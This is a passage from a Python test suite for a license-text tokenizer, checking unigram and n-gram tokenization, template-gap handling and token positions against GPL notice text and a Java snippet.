Token(start_line=2, end_line=2, start_char=8, end_char=15, value=u'license', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=17, end_char=20, value=u'wie', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=21, end_char=24, value=u'von', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=25, end_char=28, value=u'der', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=29, end_char=33, value=u'free', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=34, end_char=42, value=u'software', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=43, end_char=53, value=u'foundation', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=54, end_char=68, value=u'ver\xf6ffentlicht', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=1, end_char=12, value=u'weitergeben', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=13, end_char=16, value=u'und', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=17, end_char=21, value=u'oder', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=23, end_char=24, value=u'n', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=1, end_char=13, value=u'modifizieren', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=15, end_char=23, value=u'entweder', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=24, end_char=29, value=u'gem\xe4\xdf', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=30, end_char=37, value=u'version', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=38, end_char=39, value=u'3', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=40, end_char=43, value=u'der', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=44, end_char=50, value=u'lizenz', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=51, end_char=55, value=u'oder', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=57, end_char=61, value=u'nach', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=62, end_char=67, value=u'ihrer', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=68, end_char=74, value=u'option', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=1, end_char=6, value=u'jeder', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=7, end_char=15, value=u'sp\xe4teren', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=6, end_line=6, start_char=1, end_char=8, value=u'version', gap=NO_GAP),
Token(start_line=6, end_line=6, start_char=10, end_char=11, value=u'n', gap=NO_GAP),
Token(start_line=7, end_line=7, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=1, end_char=4, value=u'die', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=5, end_char=21, value=u'ver\xf6ffentlichung', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=22, end_char=25, value=u'von', gap=DEFAULT_GAP),
Token(start_line=8, end_line=8, start_char=38, end_char=45, value=u'erfolgt', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=46, end_char=48, value=u'in', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=49, end_char=52, value=u'der', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=53, end_char=61, value=u'hoffnung', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=63, end_char=66, value=u'da\xdf', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=67, end_char=69, value=u'es', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=70, end_char=75, value=u'ihnen', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=76, end_char=79, value=u'von', gap=NO_GAP),
Token(start_line=9, end_line=9, start_char=1, end_char=7, value=u'nutzen', gap=NO_GAP),
Token(start_line=9, end_line=9, start_char=9, end_char=10, value=u'n', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=1, end_char=5, value=u'sein', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=6, end_char=10, value=u'wird', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=12, end_char=16, value=u'aber', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=17, end_char=21, value=u'ohne', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=22, end_char=32, value=u'irgendeine', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=33, end_char=41, value=u'garantie', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=43, end_char=48, value=u'sogar', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=49, end_char=53, value=u'ohne', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=54, end_char=57, value=u'die', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=58, end_char=67, value=u'implizite', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=68, end_char=76, value=u'garantie', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=1, end_char=4, value=u'der', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=5, end_char=15, value=u'marktreife', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=1, end_char=5, value=u'oder', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=6, end_char=9, value=u'der', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=10, end_char=24, value=u'verwendbarkeit', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=25, end_char=28, value=u'f\xfcr', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=29, end_char=34, value=u'einen', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=35, end_char=45, value=u'bestimmten', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=46, end_char=51, value=u'zweck', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=53, end_char=60, value=u'details', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=61, end_char=67, value=u'finden', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=68, end_char=71, value=u'sie', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=72, end_char=74, value=u'in', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=1, end_char=4, value=u'der', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=5, end_char=8, value=u'gnu', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=9, end_char=16, value=u'general', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=18, end_char=19, value=u'n', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=1, end_char=7, value=u'public', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=8, end_char=15, value=u'license', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=15, end_line=15, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=1, end_char=4, value=u'sie', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=5, end_char=12, value=u'sollten', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=13, end_char=16, value=u'ein', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=17, end_char=25, value=u'exemplar', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=26, end_char=29, value=u'der', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=30, end_char=33, value=u'gnu', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=34, end_char=41, value=u'general', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=42, end_char=48, value=u'public', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=49, end_char=56, value=u'license', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=57, end_char=65, value=u'zusammen', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=66, end_char=69, value=u'mit', gap=DEFAULT_GAP),
Token(start_line=17, end_line=17, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=1, end_char=9, value=u'erhalten', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=10, end_char=15, value=u'haben', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=17, end_char=22, value=u'falls', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=23, end_char=28, value=u'nicht', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=30, end_char=39, value=u'schreiben', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=40, end_char=43, value=u'sie', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=44, end_char=46, value=u'an', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=47, end_char=50, value=u'die', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=51, end_char=55, value=u'free', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=56, end_char=64, value=u'software', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=65, end_char=75, value=u'foundation', gap=NO_GAP),
Token(start_line=19, end_line=19, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=1, end_char=4, value=u'inc', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=7, end_char=9, value=u'51', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=10, end_char=18, value=u'franklin', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=19, end_char=21, value=u'st', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=23, end_char=28, value=u'fifth', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=29, end_char=34, value=u'floor', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=36, end_char=42, value=u'boston', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=44, end_char=46, value=u'ma', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=47, end_char=52, value=u'02110', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=54, end_char=57, value=u'usa', gap=NO_GAP),
]
test_file = self.get_test_loc('analysis/unicode/12180.txt')
with codecs.open(test_file, encoding='utf-8') as test:
result = list(self.template_parsing(test))
assert expected == result
def test_process_template_does_not_crash_on_unicode_rules_text_1(self):
test_file = self.get_test_loc('analysis/unicode/12290.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_does_not_crash_on_unicode_rules_text_2(self):
test_file = self.get_test_loc('analysis/unicode/12319.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_does_not_crash_on_unicode_rules_text_3(self):
test_file = self.get_test_loc('analysis/unicode/12405.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_does_not_crash_on_unicode_rules_text_4(self):
test_file = self.get_test_loc('analysis/unicode/12407.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_does_not_crash_on_unicode_rules_text_5(self):
test_file = self.get_test_loc('analysis/unicode/12420.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_detects_non_well_formed_templatized_regions(self):
lines = u'abcd{{ef'
self.assertRaises(UnbalancedTemplateError, self.template_parsing, lines)
def test_process_template_handles_combination_of_well_formed_and_ill_formed_templates_2(self):
lines = u'}}{{{{abc}}ddd}}{{'
self.assertRaises(UnbalancedTemplateError, self.template_parsing, lines)
def test_process_template_can_parse_ill_formed_template(self):
tf = self.get_test_loc('analysis/ill_formed_template/text.txt')
lines = unicode_text_lines(tf)
result = list(self.template_parsing(lines))
expected_gaps = [30, 10, 60, 70, 20]
result_gaps = [x.gap for x in result if x.gap]
assert expected_gaps == result_gaps
et = self.get_test_loc('analysis/ill_formed_template/expected_grams.json')
result_dicts = [t._asdict() for t in result]
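# Fixture regeneration switch: flipping regen to True rewrites the expected
# JSON from the current results before the comparison below.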
regen = False
if regen:
with codecs.open(et, 'w', encoding='utf-8') as out:
json.dump(result_dicts, out, indent=2)
with codecs.open(et, encoding='utf-8') as inp:
expected = json.load(inp)
assert expected == result_dicts
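# Token start/end counters are expected to be independent of the chosen
# tokenizer: unigrams and 3-grams, with or without template processing, should
# all report the same first start and last end for the same input line.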
def test_token_positions_are_kept_same_for_unigrams_and_ngrams_with_template(self):
lines = u'some text is some text {{ }} in all cases\n \n'
unigrams = unigram_tokenizer(iter([lines]), template=False)
tunigrams = unigram_tokenizer(iter([lines]), template=True)
ngrams = ngram_tokenizer(iter([lines]), ngram_len=3, template=False)
tngrams = ngram_tokenizer(iter([lines]), ngram_len=3, template=True)
expected_start_end = (0, 7,)
def check_start_end(l):
l = list(l)
result = (l[0].start, l[-1].end,)
assert expected_start_end == result
check_start_end(unigrams)
check_start_end(tunigrams)
check_start_end(ngrams)
check_start_end(tngrams)
def test_plain_unigrams_from_templated_unigrams(self):
lines = [u'My old tailor {{3 John Doe}} is quite very rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
result = list(template_processor(unigrams))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=0, value=u'my'),
Token(start=0, start_line=0, start_char=3, end_line=0, end_char=6, end=0, gap=0, value=u'old'),
Token(start=0, start_line=0, start_char=7, end_line=0, end_char=13, end=0, gap=3, value=u'tailor'),
Token(start=0, start_line=0, start_char=29, end_line=0, end_char=31, end=0, gap=0, value=u'is'),
Token(start=0, start_line=0, start_char=32, end_line=0, end_char=37, end=0, gap=0, value=u'quite'),
Token(start=0, start_line=0, start_char=38, end_line=0, end_char=42, end=0, gap=0, value=u'very'),
Token(start=0, start_line=0, start_char=43, end_line=0, end_char=47, end=0, gap=0, value=u'rich'),
]
assert expected == result
class TestLegacyNgrams(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_plain_ngrams_processor(self):
from collections import deque
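# Plain sliding-window n-gram generator kept for reference: it keeps a deque of
# at most ngram_len values, and the trailing yield flushes the final window
# (shorter if the input had fewer than ngram_len items). Unlike the Token-aware
# tokens_ngram_processor tested above, it works on bare values and ignores
# positions and gaps.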
def ngram_processor(items, ngram_len):
ngram = deque()
current_len = 0
for item in items:
if current_len == ngram_len:
yield tuple(ngram)
ngram.popleft()
current_len -= 1
ngram.append(item)
current_len += 1
yield tuple(ngram)
text = (
u'''/*COMMENT
COMMENT COMMENT
- COMMENT
*/
public static boolean activateSearchResultView() {
String defaultPerspectiveId= SearchUI.getDefaultPerspectiveId();
if (defaultPerspectiveId != null) {
IWorkbenchWindow window= SearchPlugin.getActiveWorkbenchWindow();
if (window != null && window.getShell() != null && !window.getShell().isDisposed()) {
try {
PlatformUI.getWorkbench().showPerspective(defaultPerspectiveId, window);
} catch (WorkbenchException ex) {
// show view in current perspective
}
}
}''')
expected = [
(u'comment', u'comment', u'comment', u'comment', u'public', u'static'),
(u'comment', u'comment', u'comment', u'public', u'static', u'boolean'),
(u'comment', u'comment', u'public', u'static', u'boolean',
u'activatesearchresultview'),
(u'comment', u'public', u'static', u'boolean',
u'activatesearchresultview', u'string'),
(u'public', u'static', u'boolean', u'activatesearchresultview',
u'string', u'defaultperspectiveid'),
(u'static', u'boolean', u'activatesearchresultview', u'string',
u'defaultperspectiveid', u'searchui'),
(u'boolean', u'activatesearchresultview', u'string',
u'defaultperspectiveid', u'searchui', u'getdefaultperspectiveid'),
(u'activatesearchresultview', u'string', u'defaultperspectiveid',
u'searchui', u'getdefaultperspectiveid', u'if'),
(u'string', u'defaultperspectiveid', u'searchui',
u'getdefaultperspectiveid', u'if', u'defaultperspectiveid'),
(u'defaultperspectiveid', u'searchui', u'getdefaultperspectiveid',
u'if', u'defaultperspectiveid', u'null'),
(u'searchui', u'getdefaultperspectiveid', u'if',
u'defaultperspectiveid', u'null', u'iworkbenchwindow'),
(u'getdefaultperspectiveid', u'if', u'defaultperspectiveid', u'null',
u'iworkbenchwindow', u'window'),
(u'if', u'defaultperspectiveid', u'null', u'iworkbenchwindow',
u'window', u'searchplugin'),
(u'defaultperspectiveid', u'null', u'iworkbenchwindow', u'window',
u'searchplugin', u'getactiveworkbenchwindow'),
(u'null', u'iworkbenchwindow', u'window', u'searchplugin',
u'getactiveworkbenchwindow', u'if'),
(u'iworkbenchwindow', u'window', u'searchplugin',
u'getactiveworkbenchwindow', u'if', u'window'),
(u'window', u'searchplugin', u'getactiveworkbenchwindow', u'if',
u'window', u'null'),
(u'searchplugin', u'getactiveworkbenchwindow', u'if', u'window',
u'null', u'window'),
(u'getactiveworkbenchwindow', u'if', u'window', u'null', u'window',
u'getshell'),
(u'if', u'window', u'null', u'window', u'getshell', u'null'),
(u'window', u'null', u'window', u'getshell', u'null', u'window'),
(u'null', u'window', u'getshell', u'null', u'window', u'getshell'),
(u'window', u'getshell', u'null', u'window', u'getshell', u'isdisposed'),
(u'getshell', u'null', u'window', u'getshell', u'isdisposed', u'try'),
(u'null', u'window', u'getshell', u'isdisposed', u'try', u'platformui'),
(u'window', u'getshell', u'isdisposed', u'try', u'platformui',
u'getworkbench'),
(u'getshell', u'isdisposed', u'try', u'platformui', u'getworkbench',
u'showperspective'),
(u'isdisposed', u'try', u'platformui', u'getworkbench',
u'showperspective', u'defaultperspectiveid'),
(u'try', u'platformui', u'getworkbench', u'showperspective',
u'defaultperspectiveid', u'window'),
(u'platformui', u'getworkbench', u'showperspective',
u'defaultperspectiveid', u'window', u'catch'),
(u'getworkbench', u'showperspective', u'defaultperspectiveid',
u'window', u'catch', u'workbenchexception'),
(u'showperspective', u'defaultperspectiveid', u'window', u'catch',
u'workbenchexception', u'ex'),
(u'defaultperspectiveid', u'window', u'catch', u'workbenchexception',
u'ex', u'show'),
(u'window', u'catch', u'workbenchexception', u'ex', u'show', u'view'),
(u'catch', u'workbenchexception', u'ex', u'show', u'view', u'in'),
(u'workbenchexception', u'ex', u'show', u'view', u'in', u'current'),
(u'ex', u'show', u'view', u'in', u'current', u'perspective'),
]
unigrams = (x.value for x
in unigram_splitter(text.splitlines()))
result = list(ngram_processor(unigrams, ngram_len=6))
assert expected == result
class TestNgrams(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_tokens_ngram_processor_bigrams_from_unigrams(self):
text = u'this is some text \n on multiple lines'
unigrams = unigram_splitter(text.splitlines())
result = list(tokens_ngram_processor(unigrams, ngram_len=2))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
(Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is'),
Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some')),
(Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some'),
Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text')),
(Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text'),
Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on')),
(Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on'),
Token(start_line=1, start_char=4, end_line=1, end_char=12, value=u'multiple')),
(Token(start_line=1, start_char=4, end_line=1, end_char=12, value=u'multiple'),
Token(start_line=1, start_char=13, end_line=1, end_char=18, value=u'lines'))
]
assert expected == result
def test_tokens_ngram_processor_n2_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=2))
assert expected == result
def test_tokens_ngram_processor_n3_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=3))
assert expected == result
def test_tokens_ngram_processor_n4_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=4))
assert expected == result
def test_tokens_ngram_processor_n10_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=10))
assert expected == result
def test_tokens_ngram_processor_n1_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),),
(Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is'),),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=1))
assert expected == result
def test_tokens_ngram_processor_3grams_from_unigrams_on_multilines(self):
text = u'this is some text \n on multiple lines'
unigrams = unigram_splitter(text.splitlines())
result = list(tokens_ngram_processor(unigrams, ngram_len=3))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is'),
Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some')),
(Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is'),
Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some'),
Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text')),
(Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some'),
Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text'),
Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on')),
(Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text'),
Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on'),
Token(start_line=1, start_char=4, end_line=1, end_char=12, value=u'multiple')),
(Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on'),
Token(start_line=1, start_char=4, end_line=1, end_char=12, value=u'multiple'),
Token(start_line=1, start_char=13, end_line=1, end_char=18, value=u'lines'))
]
assert expected == result
def test_tokens_ngram_processor_with_template_gaps_basic(self):
lines = [u'My old {{3 John Doe}} is rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
result = list(tokens_ngram_processor(templated, ngram_len=3))
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=0, value=u'my'),
Token(start=0, start_line=0, start_char=3, end_line=0, end_char=6, end=0, gap=3, value=u'old'),
),
(Token(start=0, start_line=0, start_char=22, end_line=0, end_char=24, end=0, gap=0, value=u'is'),
Token(start=0, start_line=0, start_char=25, end_line=0, end_char=29, end=0, gap=0, value=u'rich'),
)
]
assert expected == result
def test_tokens_ngram_processor_with_template_gaps_merged(self):
lines = [u'My old tailor {{3 John Doe}} is quite very rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
ngrams_tuples = tokens_ngram_processor(templated, ngram_len=ngram_len)
result = list(ngram_to_token(ngrams_tuples))
expected = [
Token(start_line=0, start_char=0, end_line=0, end_char=13, gap=ngram_len, value=(u'my', u'old', u'tailor')),
Token(start_line=0, start_char=29, end_line=0, end_char=42, gap=0, value=(u'is', u'quite', u'very')),
Token(start_line=0, start_char=32, end_line=0, end_char=47, gap=0, value=(u'quite', u'very', u'rich')),
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_merged_short_grams(self):
lines = [u'My {{3 tailor Joe}} is quite {{ pleasant and }} very rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
ngrams_tuples = tokens_ngram_processor(templated, ngram_len=ngram_len)
result = list(ngram_to_token(ngrams_tuples))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=3, value=(u'my',)),
Token(start=0, start_line=0, start_char=20, end_line=0, end_char=28, end=0, gap=5, value=(u'is', u'quite')),
Token(start=0, start_line=0, start_char=48, end_line=0, end_char=57, end=0, gap=0, value=(u'very', u'rich'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_merged_short_and_long_grams(self):
lines = [u'My {{3 tailor Joe}} is quite {{ pleasant and }} very rich really rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
ngrams_tuples = tokens_ngram_processor(templated, ngram_len=ngram_len)
result = list(ngram_to_token(ngrams_tuples))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=3, value=(u'my',)),
Token(start=0, start_line=0, start_char=20, end_line=0, end_char=28, end=0, gap=5, value=(u'is', u'quite')),
Token(start=0, start_line=0, start_char=48, end_line=0, end_char=64, end=0, gap=0, value=(u'very', u'rich', u'really')),
Token(start=0, start_line=0, start_char=53, end_line=0, end_char=69, end=0, gap=0, value=(u'rich', u'really', u'rich'))
]
assert expected == result
def test_ngram_to_token_processor_with_gaps_at_the_end(self):
lines = [u'My {{3 tailor Joe}} is quite {{ pleasant and }}']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
ngrams_tuples = tokens_ngram_processor(templated, ngram_len=ngram_len)
result = list(ngram_to_token(ngrams_tuples))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=3, value=(u'my',)),
Token(start=0, start_line=0, start_char=20, end_line=0, end_char=28, end=0, gap=5, value=(u'is', u'quite'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_at_the_end_does_not_yield_empty_tuples(self):
lines = [u'My {{3 tailor Joe}} is quite {{ pleasant and }}']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
result = list(tokens_ngram_processor(templated, ngram_len=ngram_len))
assert (None, None, None,) != result[-1]
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=3, value=u'my'),),
(Token(start=0, start_line=0, start_char=20, end_line=0, end_char=22, end=0, gap=0, value=u'is'),
Token(start=0, start_line=0, start_char=23, end_line=0, end_char=28, end=0, gap=5, value=u'quite'),
)
]
assert expected == result
def test_ngrams_tokenizer_does_not_yield_4grams_for_3grams(self):
lines = u'''Neither the name of {{10 the ORGANIZATION}} nor {{}}the names {{}}of its contributors may
materials provided with the distribution.'''.splitlines()
result = list(ngram_tokenizer(iter(lines), ngram_len=3, template=True))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=16, end=2, gap=0, value=(u'neither', u'the', u'name')),
Token(start=1, start_line=0, start_char=8, end_line=0, end_char=19, end=3, gap=10, value=(u'the', u'name', u'of')),
Token(start=4, start_line=0, start_char=44, end_line=0, end_char=47, end=4, gap=5, value=(u'nor',)),
Token(start=5, start_line=0, start_char=52, end_line=0, end_char=61, end=6, gap=5, value=(u'the', u'names')),
Token(start=7, start_line=0, start_char=66, end_line=0, end_char=85, end=9, gap=0, value=(u'of', u'its', u'contributors')),
Token(start=8, start_line=0, start_char=69, end_line=0, end_char=89, end=10, gap=0, value=(u'its', u'contributors', u'may')),
Token(start=9, start_line=0, start_char=73, end_line=1, end_char=25, end=11, gap=0, value=(u'contributors', u'may', u'materials')),
Token(start=10, start_line=0, start_char=86, end_line=1, end_char=34, end=12, gap=0, value=(u'may', u'materials', u'provided')),
Token(start=11, start_line=1, start_char=16, end_line=1, end_char=39, end=13, gap=0, value=(u'materials', u'provided', u'with')),
Token(start=12, start_line=1, start_char=26, end_line=1, end_char=43, end=14, gap=0, value=(u'provided', u'with', u'the')),
Token(start=13, start_line=1, start_char=35, end_line=1, end_char=56, end=15, gap=0, value=(u'with', u'the', u'distribution'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_merged_always_returns_3grams_when_requested(self):
lines = u'''Neither the name of {{10 the ORGANIZATION}} nor {{}}the
names {{}}of its contributors may materials provided with
the distribution.'''.splitlines()
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
result = list(tokens_ngram_processor(templated, ngram_len=3))
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=7, end=0, gap=0, value=u'neither'),
Token(start=0, start_line=0, start_char=8, end_line=0, end_char=11, end=0, gap=0, value=u'the'),
Token(start=0, start_line=0, start_char=12, end_line=0, end_char=16, end=0, gap=0, value=u'name')),
(Token(start=0, start_line=0, start_char=8, end_line=0, end_char=11, end=0, gap=0, value=u'the'),
Token(start=0, start_line=0, start_char=12, end_line=0, end_char=16, end=0, gap=0, value=u'name'),
Token(start=0, start_line=0, start_char=17, end_line=0, end_char=19, end=0, gap=10, value=u'of')),
(Token(start=0, start_line=0, start_char=44, end_line=0, end_char=47, end=0, gap=5, value=u'nor'),),
(Token(start=0, start_line=0, start_char=52, end_line=0, end_char=55, end=0, gap=0, value=u'the'),
Token(start=0, start_line=1, start_char=19, end_line=1, end_char=24, end=0, gap=5, value=u'names')),
(Token(start=0, start_line=1, start_char=29, end_line=1, end_char=31, end=0, gap=0, value=u'of'),
Token(start=0, start_line=1, start_char=32, end_line=1, end_char=35, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors')),
(Token(start=0, start_line=1, start_char=32, end_line=1, end_char=35, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may')),
(Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
